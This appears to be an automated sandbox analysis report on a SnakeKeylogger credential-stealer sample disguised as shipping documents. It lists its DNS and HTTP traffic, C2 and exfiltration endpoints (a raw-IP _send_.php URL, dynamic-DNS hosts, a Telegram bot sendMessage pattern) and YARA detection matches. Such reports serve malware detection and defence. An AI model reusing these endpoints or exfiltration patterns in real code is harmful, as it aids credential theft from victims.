Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.bulatpharmaceutical.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 29 Oct 2024 09:32:24 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 29 Oct 2024 09:32:30 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000323F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3917774327.0000000000434000.00000040.00000400.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3917772497.0000000000433000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3917772497.0000000000433000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/0
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/sfig2.crt0
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://certs.starfieldtech.com/repository/1402
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3917774327.0000000000434000.00000040.00000400.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.starfieldtech.com/sfig2s1-677.crl0c
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.starfieldtech.com/sfroot-g2.crl0L
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3919639606.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.starfieldtech.com/sfroot.crl0L
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000323F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.bulatpharmaceutical.com
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3919639606.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.starfieldtech.com/08
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.starfieldtech.com/0;
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.starfieldtech.com/0F
Source: rShippingDocuments240384.exe, 00000000.00000002.1486523776.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1527172861.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rShippingDocuments240384.exe, tdcorV.exe.0.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3917772497.0000000000433000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3927879096.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3917772497.0000000000435000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20a
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3927879096.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3919639606.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://certs.starfieldtech.com/repository/0
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3927879096.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3927879096.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 0000000E.00000002.3920889252.0000000003282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000327D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.0000000003110000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000317F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3917774327.0000000000434000.00000040.00000400.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 0000000E.00000002.3920889252.000000000313A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.72
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000317F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000313A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.72$
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3927879096.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 0000000E.00000002.3920889252.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000032A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000032AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 51299 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51300 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51300
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51299
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:51300 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: rShippingDocuments240384.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C32F70 NtQueryInformationProcess,	0_2_07C32F70
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C32F68 NtQueryInformationProcess,	0_2_07C32F68
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_07112F70 NtQueryInformationProcess,	10_2_07112F70
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_07112F68 NtQueryInformationProcess,	10_2_07112F68

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_05794868	0_2_05794868
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_05794859	0_2_05794859
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C1EF18	0_2_07C1EF18
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C1EF11	0_2_07C1EF11
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C30308	0_2_07C30308
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C34CC0	0_2_07C34CC0
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C3B6E8	0_2_07C3B6E8
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C32380	0_2_07C32380
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C30303	0_2_07C30303
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C3D1F8	0_2_07C3D1F8
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C330F0	0_2_07C330F0
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31F43	0_2_07C31F43
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C3BF58	0_2_07C3BF58
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C34F20	0_2_07C34F20
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C34F30	0_2_07C34F30
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C34CB3	0_2_07C34CB3
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C3DBF8	0_2_07C3DBF8
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C3BB20	0_2_07C3BB20
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C32840	0_2_07C32840
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_09843178	0_2_09843178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013B7118	9_2_013B7118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013BC146	9_2_013BC146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013BA088	9_2_013BA088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013B5362	9_2_013B5362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013BD278	9_2_013BD278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013BC468	9_2_013BC468
